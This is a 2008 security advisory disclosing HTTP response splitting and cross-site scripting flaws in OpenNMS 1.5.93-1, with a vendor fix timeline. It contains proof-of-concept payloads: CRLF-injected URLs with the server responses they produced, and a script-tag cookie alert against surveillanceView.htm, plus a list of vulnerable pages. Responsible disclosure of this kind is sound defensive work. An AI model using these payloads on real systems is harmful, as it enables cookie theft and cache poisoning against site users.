OpenNMS Multiple Vulnerabilities
BugSec | Security Advisory Moshe Ben-Abu | Security Expert
Advisory URL (PDF): http://www.bugsec.com/up_files/OpenNMS_Multiple_Vulnerabilities.pdf
OPENNMS MULTIPLE VULNERABILITIES 1 Vendor 3 Application Description 3 OpenNMS HTTP Response Splitting Vulnerability 3 Vulnerability Information 3 Vulnerability Details 3 Proof-of-Concept 4 OpenNMS Cross-Site Scripting Vulnerabilities 5 Vulnerability Information 5 Vulnerability Details 5 Proof-of-Concept 5 Security Analysis 6 Discovery 6 Disclosure Timeline 6 About BugSec LTD. 6 References 6
Vendor OpenNMS Group – http://www.opennms.com OpenNMS Project – http://www.opennms.org
Application Description “OpenNMS is the world's first enterprise grade network management platform developed under the open source model. It consists of a community supported open-source project as well as a commercial services, training, and support organization. - From OpenNMS Project website.
OpenNMS HTTP Response Splitting Vulnerability Vulnerability Information Remotely exploitable: Yes Locally exploitable: No Affected versions: OpenNMS 1.5.93-1 Other versions may also be affected.
Header injection http://server/opennms/event/query?%0D%0AInjectedHeader:%20BugSec
Server response HTTP/1.1 302 Moved Temporarily Date: Thu, 25 Sep 2008 11:30:05 GMT Server: Apache/2.2.3 Location: http://server/opennms/event/list? InjectedHeader: BugSec= Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8
HTTP Response Splitting http://server/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text /html%0D%0AContent-Length:%2036%0D%0A%0D%0A<html><body>BugSec</body></html><!--
Server response HTTP/1.1 302 Moved Temporarily Date: Thu, 25 Sep 2008 11:35:20 GMT Server: Apache/2.2.3 Location: http://server/opennms/event/list? Content-Length: 0
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 36
<html><body>BugSec</body></html><!--= Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8
OpenNMS Cross-Site Scripting Vulnerabilities Vulnerability Information Remotely exploitable: Yes Locally exploitable: No Affected versions: • OpenNMS 1.5.93-1 Other versions may also be affected.
Vulnerability Details An input validation problem exists within OpenNMS which allows execution of arbitrary client-side code resulting in a cross-site scripting vulnerability. An attacker may leverage cross-site scripting vulnerability to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Proof-of-Concept surveillanceView.htm - viewName http://server/opennms/surveillanceView.htm?viewName=<script>alert(document.cookie)</script>
Vulnerable pages http://server/opennms/asset/modifyAsset http://server/opennms/distributedStatusDetails.htm http://server/opennms/distributedStatusHistory.htm http://server/opennms/event/query http://server/opennms/graph/adhoc2.jsp http://server/opennms/graph/chooseresource.htm http://server/opennms/graph/results.htm http://server/opennms/ksc/customView.htm http://server/opennms/ksc/formProcMain.htm http://server/opennms/notification/browse http://server/opennms/notification/list.jsp http://server/opennms/outage/list http://server/opennms/rtc/category.jsp http://server/opennms/statisticsReports/index.htm http://server/opennms/statisticsReports/report.htm http://server/opennms/surveillanceView.htm
Security Analysis Discovery Moshe Ben-Abu BugSec LTD. - Security Consulting Company http://www.bugsec.com
Disclosure Timeline 25/09/2008 – BugSec Security Team notifies OpenNMS team about security vulnerabilities discovered in OpenNMS, sending security advisory draft. 25/09/2008 – Vendor acknowledgment notification. 26/09/2008 – OpenNMS 1.5.94 released, fixing HTTP response splitting vulnerability but not the cross-site scripting vulnerabilities. 01/10/2008 – OpenNMS 1.5.96 released, fixing cross-site scripting vulnerabilities. 05/10/2008 – Advisory released.
About BugSec LTD. BugSec Services provide IT & Application Security services for large scaled organizations. Among services; Penetration Testing, Risk Assessments, Secure Code Development and Guidance.
BugSec Solutions develops innovative products and tools which gives focused solution to systems data security issues, such as Web Application Security, Secure coding and Anti-Phishing solution.
References  “HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics” by Amit Klein, http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf